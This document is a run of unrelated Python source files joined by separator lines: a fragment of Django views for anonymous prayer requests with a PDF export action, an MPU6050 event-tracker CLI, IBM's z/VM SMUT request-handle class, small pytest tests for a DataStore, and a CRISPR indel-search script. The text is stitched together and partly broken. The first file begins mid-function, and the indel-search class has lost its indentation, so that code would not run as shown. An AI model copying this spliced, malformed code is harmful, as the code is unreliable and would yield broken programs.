            return HttpResponseRedirect(reverse_lazy('request_form_sub_success'))
        return render(request, 'pages/home.html', {'form': form})
# class RequestCreateView(CreateView):
# model = AnonymousMessage
# # form_class = RequestCreateForm
# template_name = "pages/home.html"
# fields = ['request']
# def form_valid(self, form: BaseModelForm) -> HttpResponse:
# request_form = form.save()
# response = HttpResponse()
# # response["HX-Trigger"] = json.dumps(
# # {"redirect": {"url": request_form_sub_success}}
# # )
# return response
# Module-level callable wired up in the URLconf.
request_create_view = RequestCreateView.as_view()
# def request_create_view(request, pk):
# # author = Author.objects.get(id=pk)
# model = AnonymousMessage
# # books = Book.objects.filter(author=author)
# # form = BookForm(request.POST or None)
# form = RequestCreateForm
# if request.method == "POST":
# if form.is_valid():
# form.save()
# # book.author = author
# # book.save()
# return redirect("success")
# else:
# return render(request, "pages/home.html", context={
# "form": form
# })
# context = {
# "form": form,
# # "author": author,
# # "books": books
# }
# return render(request, "pages/home.html", context)
def request_successful_submit(request):
    """Render the static 'request submitted' confirmation page."""
    return render(request, "pages/success.html")
def export_audits_as_pdf(self, request, queryset):
    """Admin action: render the `request` field of each selected row into a
    downloadable PDF table attached to the HTTP response.

    NOTE(review): SimpleDocTemplate / Table / TableStyle / colors / inch come
    from reportlab and are not imported in this view module as shown —
    confirm those imports exist in the full file.
    """
    from datetime import datetime

    # Bug fix: the old code formatted `time.hour`, where `time` was the
    # datetime.time CLASS imported at module level — that embedded an
    # attribute-descriptor repr in the filename. Use the current hour.
    file_name = "prayer_request{0}.pdf".format(datetime.now().hour)
    response = HttpResponse(content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename="{0}"'.format(file_name)

    # One header row followed by one row per selected message.
    data = [['request']]
    for d in queryset.all():
        data.append([d.request])

    doc = SimpleDocTemplate(response, pagesize=(21 * inch, 29 * inch))
    table_data = Table(data)
    table_data.setStyle(TableStyle([('ALIGN', (0, 0), (-1, -1), 'LEFT'),
                                    ('BOX', (0, 0), (-1, -1), 0.25, colors.black),
                                    ("FONTSIZE", (0, 0), (-1, -1), 13)]))
    doc.build([table_data])
    return response
|
import argparse
import logging
import json
from .transport import CTSocketClient
from .event_trackers import testing, mpu6050
def main():
    """CLI entry point: build the argument parser, construct the transport
    client and the selected event tracker, then pump events until stopped."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--client-id', required=True)
    subparsers = parser.add_subparsers()

    mock_parser = subparsers.add_parser('testing', help='used for autotests')
    mock_parser.add_argument('program', nargs='*')
    mock_parser.set_defaults(
        get_tracker=lambda client, args: testing.TestingEventTracker(client, args.program),
        etype=testing.TestingEventTracker.EVENT_TYPE,
    )

    mpu_parser = subparsers.add_parser('mpu6050')
    mpu_parser.add_argument('server_port', nargs='?', type=int,
                            help="optional TCP server that streams both raw "
                                 "and filtered data to all clients. used for "
                                 "debugging")
    mpu_parser.add_argument('--accel-calibration',
                            help="optional JSON file that contains calibration"
                                 " data for accelerometer")
    mpu_parser.set_defaults(
        get_tracker=lambda client, args: load_mpu6050_eventtracker(
            client, args.server_port, args.accel_calibration
        ),
        etype=mpu6050.Mpu6050EventTracker.EVENT_TYPE,
    )

    def load_mpu6050_eventtracker(client, server_port, accel_calibration):
        # Deferred so the calibration file is only read when the mpu6050
        # subcommand is actually selected.
        if accel_calibration:
            with open(accel_calibration) as f:
                data = json.load(f)
            accel_offsets = data['x_offs'], data['y_offs'], data['z_offs']
        else:
            log.info('using development accelerometer calibration params')
            accel_offsets = 0.42, -1.11, 0.255
        return mpu6050.Mpu6050EventTracker(
            client,
            run_server_at_port=server_port,
            accel_offsets=accel_offsets,
        )

    logging.basicConfig(level=logging.INFO)
    log = logging.getLogger(__name__)
    args = parser.parse_args()

    def on_config_enabled(etype, params):
        tracker.on_config_enabled(etype, params)

    def on_config_disabled(etype, params):
        # Bug fix: this callback previously forwarded to
        # tracker.on_config_enabled, so a "disable" message re-enabled the
        # tracker instead of disabling it.
        tracker.on_config_disabled(etype, params)

    client = CTSocketClient(args.client_id, [args.etype],
                            on_config_enabled, on_config_disabled)
    tracker = args.get_tracker(client, args)
    client.start()
    try:
        tracker.run()
    except KeyboardInterrupt:
        pass
    finally:
        # Always shut the transport down, even on tracker failure.
        client.stop()
|
# Request Handle for Systems Management Ultra Thin Layer
#
# Copyright 2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import logging.handlers
import shlex
from six import string_types
from smutLayer import changeVM
from smutLayer import cmdVM
from smutLayer import deleteVM
from smutLayer import getHost
from smutLayer import getVM
from smutLayer import makeVM
from smutLayer import migrateVM
from smutLayer import msgs
from smutLayer import smapi
from smutLayer import powerVM
from zvmsdk import log as zvmsdklog
modId = "RQH"  # Module identifier embedded in error messages built from msgs
version = '1.0.0'  # Version of this script
class ReqHandle(object):
    """
    Systems Management Ultra Thin Layer Request Handle.
    This class contains all information related to a specific request.
    All functions are passed this request handle.
    """

    # Dispatch table: function name -> [showInvLines, showOperandLines,
    # parseCmdline, doIt] handlers for that function.
    funcHandler = {
        'CHANGEVM': [
            lambda rh: changeVM.showInvLines(rh),
            lambda rh: changeVM.showOperandLines(rh),
            lambda rh: changeVM.parseCmdline(rh),
            lambda rh: changeVM.doIt(rh)],
        'CMDVM': [
            lambda rh: cmdVM.showInvLines(rh),
            lambda rh: cmdVM.showOperandLines(rh),
            lambda rh: cmdVM.parseCmdline(rh),
            lambda rh: cmdVM.doIt(rh)],
        'DELETEVM': [
            lambda rh: deleteVM.showInvLines(rh),
            lambda rh: deleteVM.showOperandLines(rh),
            lambda rh: deleteVM.parseCmdline(rh),
            lambda rh: deleteVM.doIt(rh)],
        'GETHOST': [
            lambda rh: getHost.showInvLines(rh),
            lambda rh: getHost.showOperandLines(rh),
            lambda rh: getHost.parseCmdline(rh),
            lambda rh: getHost.doIt(rh)],
        'GETVM': [
            lambda rh: getVM.showInvLines(rh),
            lambda rh: getVM.showOperandLines(rh),
            lambda rh: getVM.parseCmdline(rh),
            lambda rh: getVM.doIt(rh)],
        'MAKEVM': [
            lambda rh: makeVM.showInvLines(rh),
            lambda rh: makeVM.showOperandLines(rh),
            lambda rh: makeVM.parseCmdline(rh),
            lambda rh: makeVM.doIt(rh)],
        'MIGRATEVM': [
            lambda rh: migrateVM.showInvLines(rh),
            lambda rh: migrateVM.showOperandLines(rh),
            lambda rh: migrateVM.parseCmdline(rh),
            lambda rh: migrateVM.doIt(rh)],
        'POWERVM': [
            lambda rh: powerVM.showInvLines(rh),
            lambda rh: powerVM.showOperandLines(rh),
            lambda rh: powerVM.parseCmdline(rh),
            lambda rh: powerVM.doIt(rh)],
        'SMAPI': [
            lambda rh: smapi.showInvLines(rh),
            lambda rh: smapi.showOperandLines(rh),
            lambda rh: smapi.parseCmdline(rh),
            lambda rh: smapi.doIt(rh)],
        }

    def __init__(self, **kwArgs):
        """
        Constructor

        Input:
           captureLogs=<True|False>
                       Enables or disables log capture for all requests.
           cmdName=<cmdName>
                       Name of the command that is using ReqHandle.
                       This is only used for the function help.
                       It defaults to "smutCmd.py".
           requestId=requestId
                       Optional request Id
           smut=<smutDaemon>
                       SMUT daemon, it it exists.
        """
        self.results = {
            'overallRC': 0,     # Overall return code for the function, e.g.
                                #   0  - Everything went ok
                                #   2  - Something in the IUCVCLNT failed
                                #   3  - Something in a local vmcp failed
                                #   4  - Input validation error
                                #   5  - Miscellaneous processing error
                                #   8  - SMCLI - SMAPI failure
                                #   24 - SMCLI - Parsing failure
                                #   25 - SMCLI - Internal Processing Error
                                #   99 - Unexpected failure
            'rc': 0,            # Return code causing the return
            'rs': 0,            # Reason code causing the return
            'errno': 0,         # Errno value causing the return
            'strError': '',     # Error as a string value.
                                #   Normally, this is the errno description.
            'response': [],     # Response strings
            'logEntries': [],   # Syslog entries related to this request
            }
        if 'smut' in kwArgs.keys():
            self.daemon = kwArgs['smut']    # SMUT Daemon
            # Actual SysLog handling is done in SMUT.
        else:
            self.daemon = ''
            # Set up SysLog handling to be done by ReqHandle
            self.logger = logging.getLogger(__name__)
            self.logger.setLevel(logging.DEBUG)
            self.handler = logging.handlers.SysLogHandler(address='/dev/log')
            self.formatter = (
                logging.Formatter('%(module)s.%(funcName)s: %(message)s'))
            self.handler.setFormatter(self.formatter)
            self.logger.addHandler(self.handler)

        if 'cmdName' in kwArgs.keys():
            self.cmdName = kwArgs['cmdName']
        else:
            self.cmdName = 'smutCmd.py'

        if 'requestId' in kwArgs.keys():
            self.requestId = kwArgs['requestId']
        else:
            self.requestId = 'REQ_' + hex(id(self))[2:]
            # <todo> Need to generate a default request Id

        self.function = ''      # Function being processed
        self.subfunction = ''   # Subfunction be processed (optional)
        self.userid = ''        # Target userid
        self.parms = {}         # Dictionary of additional parms
        self.argPos = 0         # Prep to parse first command line arg

        # Capture & return Syslog entries
        if 'captureLogs' in kwArgs.keys():
            self.captureLogs = kwArgs['captureLogs']
        else:
            self.captureLogs = False

    def driveFunction(self):
        """
        Drive the function/subfunction call.

        Input:
           Self with request filled in.

        Output:
           Request Handle updated with the results.
           Overall return code - 0: successful, non-zero: error
        """
        if self.function == 'HELP':
            # General help for all functions.
            self.printLn("N", "")
            self.printLn("N", "Usage:")
            self.printLn("N", "  python " + self.cmdName + " --help")
            for key in sorted(ReqHandle.funcHandler):
                ReqHandle.funcHandler[key][0](self)
            self.printLn("N", "")
            self.printLn("N", "Operand(s):")
            for key in sorted(ReqHandle.funcHandler):
                ReqHandle.funcHandler[key][1](self)
            self.printLn("N", "")
            self.updateResults({}, reset=1)
        elif self.function == 'VERSION':
            # Version of ReqHandle.
            self.printLn("N", "Version: " + version)
            self.updateResults({}, reset=1)
        else:
            # Some type of function/subfunction invocation.
            if self.function in self.funcHandler:
                # Invoke the functions doIt routine to route to the
                # appropriate subfunction.
                self.funcHandler[self.function][3](self)
            else:
                # Unrecognized function
                msg = msgs.msg['0007'][1] % (modId, self.function)
                self.printLn("ES", msg)
                self.updateResults(msgs.msg['0007'][0])
        return self.results

    def parseCmdline(self, requestData):
        """
        Parse the request command string.

        Input:
           Self with request filled in.

        Output:
           Request Handle updated with the parsed information so that
           it is accessible via key/value pairs for later processing.
           Return code - 0: successful, non-zero: error
        """
        self.printSysLog("Enter ReqHandle.parseCmdline")

        # Save the request data based on the type of operand.
        if isinstance(requestData, list):
            self.requestString = ' '.join(requestData)  # Request as a string
            self.request = requestData                  # Request as a list
        elif isinstance(requestData, string_types):
            self.requestString = requestData            # Request as a string
            self.request = shlex.split(requestData)     # Request as a list
        else:
            # Request data type is not supported.
            msg = msgs.msg['0012'][1] % (modId, type(requestData))
            self.printLn("ES", msg)
            self.updateResults(msgs.msg['0012'][0])
            return self.results
        self.totalParms = len(self.request)  # Number of parms in the cmd

        # Handle the request, parse it or return an error.
        if self.totalParms == 0:
            # Too few arguments.
            msg = msgs.msg['0009'][1] % modId
            self.printLn("ES", msg)
            self.updateResults(msgs.msg['0009'][0])
        elif self.totalParms == 1:
            self.function = self.request[0].upper()
            if self.function == 'HELP' or self.function == 'VERSION':
                pass
            else:
                # Function is not HELP or VERSION.
                msg = msgs.msg['0008'][1] % (modId, self.function)
                self.printLn("ES", msg)
                self.updateResults(msgs.msg['0008'][0])
        else:
            # Process based on the function operand.
            self.function = self.request[0].upper()
            # Bug fix: compare the upper-cased function name (as the
            # single-parm branch above does) so 'help foo' and 'HELP foo'
            # behave the same; the old code compared the raw request token.
            if self.function == 'HELP' or self.function == 'VERSION':
                pass
            else:
                # Handle the function related parms by calling the function
                # parser.
                if self.function in ReqHandle.funcHandler:
                    self.funcHandler[self.function][2](self)
                else:
                    # Unrecognized function
                    msg = msgs.msg['0007'][1] % (modId, self.function)
                    self.printLn("ES", msg)
                    self.updateResults(msgs.msg['0007'][0])
        self.printSysLog("Exit ReqHandle.parseCmdline, rc: " +
            str(self.results['overallRC']))
        return self.results

    def printLn(self, respType, respString):
        """
        Add one or lines of output to the response list.

        Input:
           Response type: One or more characters indicate type of response.
              E - Error message
              N - Normal message
              S - Output should be logged
              W - Warning message
        """
        if 'E' in respType:
            respString = '(Error) ' + respString
        if 'W' in respType:
            respString = '(Warning) ' + respString
        if 'S' in respType:
            self.printSysLog(respString)
        self.results['response'] = (self.results['response'] +
                                    respString.splitlines())
        return

    def printSysLog(self, logString):
        """
        Log one or more lines. Optionally, add them to logEntries list.

        Input:
           Strings to be logged.
        """
        if zvmsdklog.LOGGER.getloglevel() <= logging.DEBUG:
            # print log only when debug is enabled
            if self.daemon == '':
                self.logger.debug(self.requestId + ": " + logString)
            else:
                self.daemon.logger.debug(self.requestId + ": " + logString)
        if self.captureLogs is True:
            self.results['logEntries'].append(self.requestId + ": " +
                logString)
        return

    def updateResults(self, newResults, **kwArgs):
        """
        Update the results related to this request excluding the 'response'
        and 'logEntries' values.
        We specifically update (if present):
           overallRC, rc, rs, errno.

        Input:
           Dictionary containing the results to be updated or an empty
              dictionary the reset keyword was specified.
           Reset keyword:
              0 - Not a reset.  This is the default is reset keyword was not
                  specified.
              1 - Reset failure related items in the result dictionary.
                  This exclude responses and log entries.
              2 - Reset all result items in the result dictionary.

        Output:
           Request handle is updated with the results.
        """
        if 'reset' in kwArgs.keys():
            reset = kwArgs['reset']
        else:
            reset = 0

        if reset == 0:
            # Not a reset.  Set the keys from the provided dictionary.
            for key in newResults.keys():
                if key == 'response' or key == 'logEntries':
                    continue
                self.results[key] = newResults[key]
        elif reset == 1:
            # Reset all failure related items.
            self.results['overallRC'] = 0
            self.results['rc'] = 0
            self.results['rs'] = 0
            self.results['errno'] = 0
            self.results['strError'] = ''
        elif reset == 2:
            # Reset all results information including any responses and
            # log entries.
            self.results['overallRC'] = 0
            self.results['rc'] = 0
            self.results['rs'] = 0
            self.results['errno'] = 0
            self.results['strError'] = ''
            # Bug fix: these two are lists everywhere else (__init__ creates
            # them as [] and printLn/printSysLog extend/append them); the old
            # code reset them to '', which made a later printLn raise
            # TypeError and logEntries.append raise AttributeError.
            self.results['logEntries'] = []
            self.results['response'] = []
        return
|
import os
from sphinxcontrib.pylit.DataStore import DataStore
def test_default_rootdir():
    # DataStore() with no argument must create its default '.pylit' root dir.
    ds = DataStore()
    assert os.path.isdir('.pylit')
    ds.delete()  # clean up so tests stay independent
def test__rootdir_specified():
    # An explicitly named root directory is created on construction.
    ds = DataStore('test_repo')
    assert os.path.isdir('test_repo')
    ds.delete()  # clean up so tests stay independent
def test_delete_rootdir():
    # delete() must remove the root directory that the constructor created.
    ds = DataStore('test_repo')
    assert os.path.isdir('test_repo')
    ds.delete()
    assert not os.path.isdir('test_repo')
|
import os, re, sys, logging
import numpy as np
import subprocess as sp
import cPickle as pickle
from pdb import set_trace
sys.path.insert(0, os.path.dirname(os.getcwd()))
from Core.CoreSystem import CoreHash, CoreGotoh
class clsParameter(object):
    """Reads the 13 positional command-line arguments that drive an indel
    search run; prints usage and exits when no arguments are given."""

    def __init__(self):
        if len(sys.argv) > 1:
            self.strForwardFqPath = sys.argv[1]   # forward FASTQ path
            self.strReverseFqPath = sys.argv[2]   # reverse FASTQ path
            self.strRefFa = sys.argv[3]           # reference FASTA path
            self.strPair = sys.argv[4]
            self.floOg = float(sys.argv[5])       # alignment Og parameter (passed to CoreGotoh)
            self.floOe = float(sys.argv[6])       # alignment Oe parameter (passed to CoreGotoh)
            self.intInsertionWin = int(sys.argv[7])
            self.intDeletionWin = int(sys.argv[8])
            self.strPamType = sys.argv[9].upper()       ## Cpf1, Cas9
            self.strBarcodePamPos = sys.argv[10]        ## PAM - BARCODE type (reverse) or BARCODE - PAM type (forward)
            self.intQualCutoff = int(sys.argv[11])
            self.strOutputdir = sys.argv[12]
            self.strLogPath = sys.argv[13]
            self.strEDNAFULL = os.path.abspath('../EDNAFULL')  # substitution matrix file
        else:
            # No arguments: show usage and stop.
            sManual = """
            Usage:

            python2.7 ./indel_search_ver1.0.py splitted_input_1.fq splitted_input_2.fq reference.fa

            splitted_input_1.fq : forward
            splitted_input_2.fq : reverse

            Total FASTQ(fq) lines / 4 = remainder 0.
            """
            print(sManual)
            sys.exit()
class clsFastqOpener(object):
    """Loads paired FASTQ files into memory as (name, sequence, quality-list)
    tuples; reverse reads come back reverse-complemented."""

    def __init__(self, InstParameter):
        self.strForwardFqPath = InstParameter.strForwardFqPath
        self.strReverseFqPath = InstParameter.strReverseFqPath

    def OpenFastqForward(self):
        """Read the forward FASTQ; returns [(name, seq, [phred, ...]), ...]."""
        listFastqForward = []
        listRecord = []
        with open(self.strForwardFqPath) as Fastq1:
            for intLineNum, strRow in enumerate(Fastq1, 1):
                strRow = strRow.replace('\n', '').upper()
                intPhase = intLineNum % 4
                if intPhase == 1 or intPhase == 2:
                    # name line or sequence line, kept verbatim (upper-cased)
                    listRecord.append(strRow)
                elif intPhase == 0:
                    # quality line: decode Phred+33 to integers and close the record
                    listRecord.append([ord(strChar) - 33 for strChar in strRow])
                    listFastqForward.append(tuple(listRecord))
                    listRecord = []
        return listFastqForward

    def OpenFastqReverse(self):
        """Read the reverse FASTQ, reverse-complementing each sequence and
        reversing its qualities so they line up with the forward strand."""
        listFastqReverse = []
        listRecord = []
        dictRev = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
        with open(self.strReverseFqPath) as Fastq2:
            for intLineNum, strRow in enumerate(Fastq2, 1):
                strRow = strRow.replace('\n', '').upper()
                intPhase = intLineNum % 4
                if intPhase == 1:
                    listRecord.append(strRow)
                elif intPhase == 2:
                    # reverse complement of the sequence line
                    listRecord.append(''.join([dictRev[strNucle] for strNucle in strRow[::-1]]))
                elif intPhase == 0:
                    # qualities reversed to match the flipped sequence
                    listRecord.append([ord(strChar) - 33 for strChar in strRow][::-1])
                    listFastqReverse.append(tuple(listRecord))
                    listRecord = []
        return listFastqReverse
class clsIndelSearchParser(object):
def __init__(self, InstParameter):
    """Copy the run parameters and define the index layout of dResult rows."""
    # Indices into each dResult[barcode] list (constant variables).
    self.intNumOfTotal = 0
    self.intNumOfIns = 1
    self.intNumOfDel = 2
    self.intNumofCom = 3
    self.intTotalFastq = 4
    self.intInsFastq = 5
    self.intDelFastq = 6
    self.intComFastq = 7
    self.intIndelInfo = 8
    # Run parameters taken from the parsed command line.
    self.strRefFa = InstParameter.strRefFa
    self.floOg = InstParameter.floOg
    self.floOe = InstParameter.floOe
    self.strEDNAFULL = InstParameter.strEDNAFULL
    self.strPamType = InstParameter.strPamType
    self.intInsertionWin = InstParameter.intInsertionWin
    self.intDeletionWin = InstParameter.intDeletionWin
    self.intQualCutoff = InstParameter.intQualCutoff
def SearchBarcodeIndelPosition(self, sBarcode_PAM_pos):
    """Build the reference table (dRef) and the per-barcode result
    accumulator (dResult) from the 2-line-per-record reference FASTA.

    Even lines are headers '>BARCODE:TARGET_REGION'; odd lines are the
    reference sequence. Records whose barcode cannot be located in the
    sequence (ValueError from str.index) are skipped.
    """
    dRef = {}
    dResult = {}
    with open(self.strRefFa) as Ref:
        sBarcode = ""
        sTarget_region = ""
        intBarcodeLen = 0
        for i, sRow in enumerate(Ref):
            if i % 2 == 0:  ## >CGCTCTACGTAGACA:CTCTATTACTCGCCCCACCTCCCCCAGCCC
                sBarcode, sTarget_region, intBarcodeLen = self._SeperateFaHeader(sRow, sBarcode, sTarget_region,
                                                                                intBarcodeLen, sBarcode_PAM_pos)
            elif i % 2 != 0:  ## AGCATCGATCAGCTACGATCGATCGATCACTAGCTACGATCGATCA
                sRef_seq, iIndel_start_pos, iIndel_end_pos = self._SearchIndelPos(sRow, sBarcode_PAM_pos, sTarget_region)
                try:
                    self._MakeRefAndResultTemplate(sRef_seq, sBarcode, iIndel_start_pos, iIndel_end_pos,
                                                   sTarget_region, dRef, dResult)
                except ValueError:
                    # barcode not found inside the reference sequence
                    continue
    assert len(dRef.keys()) == len(dResult.keys())
    return dRef, dResult
def _SeperateFaHeader(self, sRow, sBarcode, sTarget_region, intBarcodeLen, sBarcode_PAM_pos):
# barcode target region
# >CGCTCTACGTAGACA:CTCTATTACTCGCCCCACCTCCCCCAGCCC
sBarcode_indel_seq = sRow.strip().replace('\n', '').replace('\r', '').split(':')
sBarcode = sBarcode_indel_seq[0].replace('>', '')
if intBarcodeLen > 0:
assert intBarcodeLen == len(sBarcode), 'All of the barcode lengths must be same.'
intBarcodeLen = len(sBarcode)
sTarget_region = sBarcode_indel_seq[1]
## Reverse the sentence. If it is done, all methods are same before work.
if sBarcode_PAM_pos == 'Reverse':
sBarcode = sBarcode[::-1]
sTarget_region = sTarget_region[::-1]
return (sBarcode, sTarget_region, intBarcodeLen)
def _SearchIndelPos(self, sRow, sBarcode_PAM_pos, sTarget_region):
sRef_seq = sRow.strip().replace('\n', '').replace('\r', '')
if sBarcode_PAM_pos == 'Reverse':
sRef_seq = sRef_seq[::-1]
Seq_matcher = re.compile(r'(?=(%s))' % sTarget_region)
# iIndel_start_pos = sRef_seq.index(sTarget_region) # There is possible to exist two indel.
iIndel_start_pos = Seq_matcher.finditer(sRef_seq)
for i, match in enumerate(iIndel_start_pos):
iIndel_start_pos = match.start()
# print iIndel_start_pos
# print len(sTarget_region)
# print sRef_seq
iIndel_end_pos = iIndel_start_pos + len(sTarget_region) - 1
return (sRef_seq, iIndel_start_pos, iIndel_end_pos)
def _MakeRefAndResultTemplate(self, sRef_seq, sBarcode, iIndel_start_pos,
iIndel_end_pos, sTarget_region, dRef, dResult):
iBarcode_start_pos = sRef_seq.index(sBarcode)
# if iIndel_start_pos <= iBarcode_start_pos:
# print(iIndel_start_pos, iBarcode_start_pos)
# raise IndexError('indel is before barcode')
iBarcode_end_pos = iBarcode_start_pos + len(sBarcode) - 1
sRef_seq_after_barcode = sRef_seq[iBarcode_end_pos + 1:]
# modified. to -1
iIndel_end_next_pos_from_barcode_end = iIndel_end_pos - iBarcode_end_pos - 1
iIndel_start_next_pos_from_barcode_end = iIndel_start_pos - iBarcode_end_pos - 1
# "barcode"-------------*(N) that distance.
# ^ ^ ^
# *NNNN*NNNN
# ^ ^ indel pos, the sequence matcher selects indel event pos front of it.
## Result
dRef[sBarcode] = (sRef_seq, sTarget_region, sRef_seq_after_barcode, iIndel_start_next_pos_from_barcode_end,
iIndel_end_next_pos_from_barcode_end, iIndel_start_pos, iIndel_end_pos) # total matched reads, insertion, deletion, complex
dResult[sBarcode] = [0, 0, 0, 0, [], [], [], [], []]
def SearchIndel(self, lFASTQ=[], dRef={}, dResult={}, sBarcode_PAM_pos=""):
    """Scan each read for a known barcode, align the post-barcode sequence
    against its reference, and tally insertion/deletion/complex events.

    lFASTQ  : [(name, seq, qual_list), ...]
    dRef    : first element returned by SearchBarcodeIndelPosition()
    dResult : second element returned by SearchBarcodeIndelPosition();
              mutated in place and also returned.
    NOTE: the mutable default arguments are kept for interface
    compatibility; callers pass all containers explicitly.
    """
    # list(...) so this works on both Python 2 lists and Python 3 dict views.
    intBarcodeLen = len(list(dRef.keys())[0])
    InstGotoh = CoreGotoh(strEDNAFULL=self.strEDNAFULL, floOg=self.floOg, floOe=self.floOe)

    for lCol_FASTQ in lFASTQ:
        sName = lCol_FASTQ[0]
        # Reverse layouts are handled by flipping the read once up front.
        if sBarcode_PAM_pos == 'Reverse':
            sSeq = lCol_FASTQ[1][::-1]
            lQual = lCol_FASTQ[2][::-1]
        else:
            sSeq = lCol_FASTQ[1]
            lQual = lCol_FASTQ[2]
        assert isinstance(sName, str) and isinstance(sSeq, str) and isinstance(lQual, list)

        # All barcode-length windows of the read, used for hash lookup.
        listSeqWindow = CoreHash.MakeHashTable(sSeq, intBarcodeLen)
        iBarcode_matched = 0
        iInsert_count = 0
        iDelete_count = 0
        iComplex_count = 0
        intFirstBarcode = 0  ## check whether a barcode is one in a sequence.

        for strSeqWindow in listSeqWindow:
            if intFirstBarcode == 1: break  ## A second barcode in a sequence is not considerable.
            try:
                lCol_ref, sBarcode, intFirstBarcode = CoreHash.IndexHashTable(dRef, strSeqWindow, intFirstBarcode)
            except KeyError:
                continue

            sRef_seq = lCol_ref[0]
            sTarget_region = lCol_ref[1]
            sRef_seq_after_barcode = lCol_ref[2]
            iIndel_start_from_barcode_pos = lCol_ref[3]
            iIndel_end_from_barcode_pos = lCol_ref[4]

            try:
                if self.strPamType == 'CAS9':
                    iKbp_front_Indel_end = iIndel_end_from_barcode_pos - 6  ## cas9:-6, cpf1:-4
                elif self.strPamType == 'CPF1':
                    # Bug fix: this compared against 'CAF1', which can never
                    # match (clsParameter upper-cases 'Cpf1' to 'CPF1'),
                    # leaving iKbp_front_Indel_end unbound for Cpf1 runs.
                    iKbp_front_Indel_end = iIndel_end_from_barcode_pos - 4  ## NN(N)*NNN(N)*NNNN
            except Exception:
                set_trace()

            ## bug fix
            if sBarcode == "": continue
            (sSeq, iBarcode_matched, sQuery_seq_after_barcode, lQuery_qual_after_barcode) = \
                self._CheckBarcodePosAndRemove(sSeq, sBarcode, iBarcode_matched, lQual)

            ## Alignment Seq to Ref
            npGapIncentive = InstGotoh.GapIncentive(sRef_seq_after_barcode)
            try:
                lResult = InstGotoh.RunCRISPResso2(sQuery_seq_after_barcode.upper(),
                                                   sRef_seq_after_barcode.upper(),
                                                   npGapIncentive)
            except Exception as e:
                logging.error(e, exc_info=True)
                continue
            sQuery_needle_ori = lResult[0]
            sRef_needle_ori = lResult[1]

            sRef_needle, sQuery_needle = self._TrimRedundantSideAlignment(sRef_needle_ori, sQuery_needle_ori)
            lInsertion_in_read, lDeletion_in_read = self._MakeIndelPosInfo(sRef_needle, sQuery_needle)

            lTarget_indel_result = []  # ['20M2I', '23M3D' ...]
            iInsert_count = self._TakeInsertionFromAlignment(lInsertion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
                                                             iIndel_end_from_barcode_pos, iInsert_count)
            iDelete_count = self._TakeDeletionFromAlignment(lDeletion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
                                                            iIndel_end_from_barcode_pos, iDelete_count)
            # A read carrying both an insertion and a deletion is "complex".
            if iInsert_count == 1 and iDelete_count == 1:
                iComplex_count = 1
                iInsert_count = 0
                iDelete_count = 0

            listResultFASTQ = self._MakeAndStoreQuality(sName, sSeq, lQual, dResult, sBarcode)

            # Mean base quality over the target window must pass the cutoff
            # before any indel is counted.
            if np.mean(lQuery_qual_after_barcode[iIndel_start_from_barcode_pos : iIndel_end_from_barcode_pos + 1]) >= self.intQualCutoff:
                # Junk sequence can sit between the barcode and the target;
                # shift the indel coordinates to target-relative positions.
                iTarget_start_from_barcode = sRef_seq_after_barcode.index(sTarget_region)
                lTrimmed_target_indel_result = self._FixPos(lTarget_indel_result, iTarget_start_from_barcode)
                sRef_seq_after_barcode, sQuery_seq_after_barcode = self._StoreToDictResult(sRef_seq_after_barcode, sQuery_seq_after_barcode, iTarget_start_from_barcode,
                                                                                           dResult, sBarcode, lTrimmed_target_indel_result, sTarget_region, sRef_needle_ori,
                                                                                           sQuery_needle_ori, iInsert_count, iDelete_count, iComplex_count, listResultFASTQ)
            else:
                iInsert_count = 0
                iDelete_count = 0
                iComplex_count = 0

            # total matched reads, insertion, deletion, complex
            dResult[sBarcode][self.intNumOfTotal] += iBarcode_matched
            dResult[sBarcode][self.intNumOfIns] += iInsert_count
            dResult[sBarcode][self.intNumOfDel] += iDelete_count
            dResult[sBarcode][self.intNumofCom] += iComplex_count
            iBarcode_matched = 0
            iInsert_count = 0
            iDelete_count = 0
            iComplex_count = 0
        #End:for
    #END:for
    return dResult
def _CheckBarcodePosAndRemove(self, sSeq, sBarcode, iBarcode_matched, lQual):
# Check the barcode pos and remove it.
sSeq = sSeq.replace('\r', '')
iBarcode_start_pos_FASTQ = sSeq.index(sBarcode)
iBarcode_matched += 1
iBarcode_end_pos_FASTQ = iBarcode_start_pos_FASTQ + len(sBarcode) - 1
"""
junk seq target region
ref: AGGAG AGAGAGAGAGA
que: AGGAG AGAGAGAGAGA
But, It doesnt know where is the target region because of existed indels.
So, There is no way not to include it.
"""
# Use this.
sQuery_seq_after_barcode = sSeq[iBarcode_end_pos_FASTQ + 1:]
lQuery_qual_after_barcode = lQual[iBarcode_end_pos_FASTQ:]
return (sSeq, iBarcode_matched, sQuery_seq_after_barcode, lQuery_qual_after_barcode)
def _TrimRedundantSideAlignment(self, sRef_needle_ori, sQuery_needle_ori):
# detach forward ---, backward ---
# e.g. ref ------AAAGGCTACGATCTGCG------
# query AAAAAAAAATCGCTCTCGCTCTCCGATCT
# trimmed ref AAAGGCTACGATCTGCG
# trimmed qeury AAATCGCTCTCGCTCTC
iReal_ref_needle_start = 0
iReal_ref_needle_end = len(sRef_needle_ori)
iRef_needle_len = len(sRef_needle_ori)
for i, sRef_nucle in enumerate(sRef_needle_ori):
if sRef_nucle in ['A', 'C', 'G', 'T']:
iReal_ref_needle_start = i
break
for i, sRef_nucle in enumerate(sRef_needle_ori[::-1]):
if sRef_nucle in ['A', 'C', 'G', 'T']:
iReal_ref_needle_end = iRef_needle_len - (i + 1)
# forward 0 1 2 len : 3
# reverse 2 1 0, len - (2 + 1) = 0
break
sRef_needle = sRef_needle_ori[iReal_ref_needle_start:iReal_ref_needle_end + 1]
if iReal_ref_needle_start:
sQuery_needle = sQuery_needle_ori[:iReal_ref_needle_end]
sQuery_needle = sQuery_needle_ori[:len(sRef_needle)]
# detaching completion
return (sRef_needle, sQuery_needle)
def _MakeIndelPosInfo(self, sRef_needle, sQuery_needle):
# indel info making.
iNeedle_match_pos_ref = 0
iNeedle_match_pos_query = 0
